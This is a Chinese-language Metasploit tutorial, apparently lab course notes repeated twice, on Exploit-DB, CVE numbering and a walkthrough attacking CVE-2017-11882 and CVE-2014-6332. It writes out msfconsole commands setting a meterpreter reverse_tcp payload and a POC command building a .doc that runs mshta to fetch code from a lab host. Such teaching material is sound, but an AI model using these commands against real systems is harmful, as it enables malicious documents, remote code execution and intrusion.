Metasploit 进阶第二讲  框架更新

 

EDB平台-互联网安全漏洞库

 

Exploit_DB是一个面向全世界安全工作人员的漏洞提交平台,是一份公开已知漏洞的存档,便于企业改善公司的安全情况,同时帮助安全研究人员及渗透测试工程师进行更好的安全测试工作。

https://www.exploit-db.com/

exploits:漏洞信息

papers:文章

GHDB: Google hacking

shellcodes:填充数据

 

 

CVE-2017-11882介绍

CVE-2017-11882Ofice远程代码执行漏洞:

 

由Microsoft office中的公式编辑器造成,该模块以OLE(Object Linking and Embedding,对象链接与嵌入)技术将公式嵌入在Office文档内,由于编辑器没有对名称长度进行校验,导致缓冲区溢出,若攻击者通过构造特殊字符,office无法正确处理内存对象,成功利用该漏洞的攻击者将能以当前用户身份在目标操作系统执行任意代码。

完美无弹窗,无异常,影响office全版本。

 

CVEMS

 

CVE是Common Vulnerabilities and Exposures的缩写,意思是公共漏洞及披露。它是一个漏洞字典,由MITRE维护,给每个暴露出来漏洞给一个公共的名称。可以在cve.mitre.org/cve/index.html中查看漏洞列表。

MS是微软维护的自身的漏洞列表。可以在technet.microsoft.com/en-

us/security/bulletins查找最新的各种相关信息。

由于两者标准不统一,为了更好对应,MITRE提供一个对应列表cve.mitre.org/data/refs/refmap/source-MS.html。

MSF添加exploit及更新Metasploit框架

添加exploit:

1.将下载的rb文件放入对应的文件夹下

2.执行reload_all或重新启动MSF

更新metasploit框架:

apt update;apt install metasploit-framework

实操:利用CVE-2017-11882攻击目标主机

MSF:

search  2017_11882

use exploit/windows/...

info

show options

set uripath/

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.24.137

run

生成POC程序(带有shell的doc文件):

python CVE-2017-11882.py  -c“mshta

http://192.168.24.137:8080/"-o11882.doc

其他POC程序生成:

https://github.com/Ridter/CVE-2017-11882

python  CVE-2017-11882.py-c"cmd.exe/c

calc.cxe" –o 11882.doc

metasploit攻击win8实例

Microsoft Windows OLE远程代码执行漏洞(CVE-2014-6332、MS14-064):

OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术。

Microsoft Windows Server 2003 SP2,Windows Vista SP2,Windows Server 2008

SP2/R2 SP1,Windows 7 SP1,Windows 8,Windows 8.1,Windows Server 2012

Gold/R2,Windows RT Gold/8.1版本在实现上存在Windows OLE自动化数组远程代码执行漏洞,远程攻击者利用此漏洞构造特殊的网页,用户使用IE浏览器查看网页时允许远程执行任意代码。

可能会遇到的问题:

1.Rex::BindFailed The address is already in use or unavailable:(0.0.0.0:4444)

lsof-i:4444  ->  kill  -9  PID(man  lsof  ->  man kill)

2.注意查看报错信息,多检索

metasploit框架打开方式:

msfconsole         启动命令行模式

armitage             启动图形化界面方式

Metasploit 进阶第二讲

框架更新

 

01 Exploit_db平台介绍

02 MSF添加exploit更新MSF

03 CVE-2017-11882利用实例

04合天网安实验室攻击win8实例

 

 

EDB平台-互联网安全漏洞库

 

Exploit_DB是一个面向全世界安全工作人员的漏洞提交平台,是一份公开已知漏洞的存档,便于企业改善公司的安全情况,同时帮助安全研究人员及渗透测试工程师进行更好的安全测试工作。

 

https://www.exploit-db.com/

 

exploits:漏洞信息

papers:文章

GHDB: Google hacking

shellcodes:填充数据

 

 

CVE-2017-11882介绍

 

CVE-2017-11882Ofice远程代码执行漏洞:

 

Microsoft office中的公式编辑器造成,该模块以OLEObject Linking and Embedding,对象链接与嵌入)技术将公式嵌入在Office文档内,由于编辑器没有对名称长度进行校验,导致缓冲区溢出,若攻击者通过构造特殊字符,office无法正确处理内存对象,成功利用该漏洞的攻击者将能以当前用户身份在目标操作系统执行任意代码。

完美无弹窗,无异常,影响office全版本。

 

 

CVEMS

 

CVECommon Vulnerabilities and Exposures的缩写,意思是公共漏洞及披露。它是一个漏洞字典,由MITRE维护,给每个暴露出来漏洞给一个公共的名称。可以在cve.mitre.org/cve/index.html中查看漏洞列表。

 

MS是微软维护的自身的漏洞列表。可以在technet.microsoft.com/en-

us/security/bulletins查找最新的各种相关信息。

由于两者标准不统一,为了更好对应,MITRE提供一个对应列表cve.mitre.org/data/refs/refmap/source-MS.html

 

MSF添加exploit及更新Metasploit框架

 

添加exploit

1.将下载的rb文件放入对应的文件夹下

2.执行reload_all或重新启动MSF

 

更新metasploit框架:

apt updateapt install metasploit-framework

实操:利用CVE-2017-11882攻击目标主机

MSF:

search  2017_11882

use exploit/windows/...

info

show options

set uripath/

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.24.137

run

生成POC程序(带有shell的doc文件):

python CVE-2017-11882.py  -c“mshta

http://192.168.24.137:8080/"-o11882.doc

其他POC程序生成:

https://github.com/Ridter/CVE-2017-11882

python  CVE-2017-11882.py-c"cmd.exe/c

calc.cxe" –o 11882.doc

合天网安实验室:metasploit攻击win8实例

Microsoft Windows OLE远程代码执行漏洞(CVE-2014-6332、MS14-064):

OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术。

Microsoft Windows Server 2003 SP2,Windows Vista SP2,Windows Server 2008

SP2/R2 SP1,Windows 7 SP1,Windows 8,Windows 8.1,Windows Server 2012

Gold/R2,Windows RT Gold/8.1版本在实现上存在Windows OLE自动化数组远程代码执行漏洞,远程攻击者利用此漏洞构造特殊的网页,用户使用IE浏览

器查看网页时允许远程执行任意代码。

可能会遇到的问题:

  1. Rex::BindFailed The address is already in use or unavailable:(0.0.0.0:4444)

lsof-i:4444  ->  kill  -9  PID(man  lsof  ->  man kill)

2.注意查看报错信息,多检索

metasploit框架打开方式:

msfconsole         启动命令行模式

armitage             启动图形化界面方式

4.Metasploit框架更新的更多相关文章

  1. iOS将自己的框架更新到cocopods上

    第一步 把自己的框架更新到github 上,为了提交地址给他人下载.这里就不详细介绍如何把项目更新到github上了 第二步 这个时候我们的项目已经挂在github上了我们需要给本地的项目新建一个Po ...

  2. iOS中 如何将自己的框架更新到cocopods上 韩俊强的博客

    每日更新关注:http://weibo.com/hanjunqiang  新浪微博! 为了更方便的集成第三方框架有了cocopods 的, 当我们有了相对比较好的框架的时候如何更新到cocopods ...

  3. 将自己的框架更新到cocopods上

    为了更方便的集成第三方框架有了cocopods 的, 当我们有了相对比较好的框架的时候如何更新到cocopods 供他人参考呢? 下面我一步一步带大家开源自己的框架. 第一步 把自己的框架更新到git ...

  4. 认识Metasploit框架

    Metasploit基础 认识Metaspliot框架 ​ Metaspliot(MSF)渗透测试框架,提供众多的接口.选项.变量.模块以供渗透工作人员使用它完成一系列的渗透攻击. 渗透攻击(Expl ...

  5. BitAdminCore框架更新日志20180531

    索引 NET Core应用框架之BitAdminCore框架应用篇系列 框架演示:http://bit.bitdao.cn 框架源码:https://github.com/chenyinxin/coo ...

  6. BitAdminCore框架更新日志20180529

    索引 NET Core应用框架之BitAdminCore框架应用篇系列 框架演示:http://bit.bitdao.cn 框架源码:https://github.com/chenyinxin/coo ...

  7. BitAdminCore框架更新日志20180523

    20180523更新内容 本次更新两个内容,一是增加视频处理功能,二是增加定时服务功能. 视频处理 定时服务 BitAdminCore框架,用最少的代码,实现最多的功能 本次新暂未发布,后续有空发布 ...

  8. BitAdminCore框架更新日志20180522

    20180522更新内容 本次更新增加了excel导入导出示例,QuerySuite组件实现导出导出,用最少代码,做最多的事,代码就是如此简单. 计划修改内容 1.人脸登录功能需要重构,目前功能不完善 ...

  9. BitAdminCore框架更新日志20180519

    20180519更新内容 昨天更新的版本,早上自己下载下来发现创建项目不成功. 这个问题已经多次出现,主要是cookiecutter编码问题,项目引用大量外部js文件,部分文件在复制的时候编码较验不通 ...

随机推荐

  1. Object-Oriented Programming Summary Ⅰ

    Part 0: 前言 令人闻风丧胆的OO还是来了.并没有像名字的外表一样可爱,简直就是恶魔. 疯狂压榨OS的时间,周末无法休息,互测狼人机制 虽然网上骂声很多,就算改进到9012年还是有很多不足的地方 ...

  2. 【春招】 java static 执行顺序

    package static类型.执行顺序; public class Test { Person person = new Person("Test"); static{ Sys ...

  3. background-attachment 制造视差滚动效果案例

    简介 background-attachment 属性设置背景图像是否固定或者随着页面的其余部分滚动.可能的值有三个: scroll 默认值.背景图像会随着页面其余部分的滚动而移动. fixed 当页 ...

  4. css3 HSLA 颜色制造半透明效果

    简介 HSL色彩模式是工业界的一种颜色标准,是通过对色调(H).饱和度(S).亮度(L)三个颜色通道的变化以及它们相互之间的叠加来得到各式各样的颜色的,HSL即是代表色调,饱和度,亮度三个通道的颜色, ...

  5. Spark入门(六)--Spark的combineByKey、sortBykey

    spark的combineByKey combineByKey的特点 combineByKey的强大之处,在于提供了三个函数操作来操作一个函数.第一个函数,是对元数据处理,从而获得一个键值对.第二个函 ...

  6. 深度学习与人类语言处理-语音识别(part2)

    上节回顾深度学习与人类语言处理-语音识别(part1),这节课我们将学习如何将seq2seq模型用在语音识别 LAS 那我们来看看LAS的Encoder,Attend,Decoder分别是什么 Lis ...

  7. [项目分享]JSP+Servlet+JDBC实现的云端汽修后台管理系统

    本文存在视频版本,请知悉 项目简介 项目来源于:https://gitee.com/chenlinSir/CloudDemo-servlet 难度等级:简单 基于JSP+Servlet+Jdbc的云端 ...

  8. PostgreSQL查询表以及字段的备注

    目录 查询所有表名称以及字段含义 查看所有表名 查看表名和备注 查看特定表名备注 查看特定表名字段 查询所有表名称以及字段含义 select c.relname 表名,cast(obj_descrip ...

  9. 【Android】Retrofit源码学习

    使用Retrofit的流程 通过Builder创建Retrofit对象: Retrofit retrofit = new Retrofit.Builder().baseUrl("" ...

  10. StringBuilder内存碎片对性能的影响

    StringBuilder内存碎片对性能的影响 TL;DR: StringBuilder内部是由多段char[]组成的半自动链表,因此频繁从中间修改StringBuilder,会将原本连续的内存分隔为 ...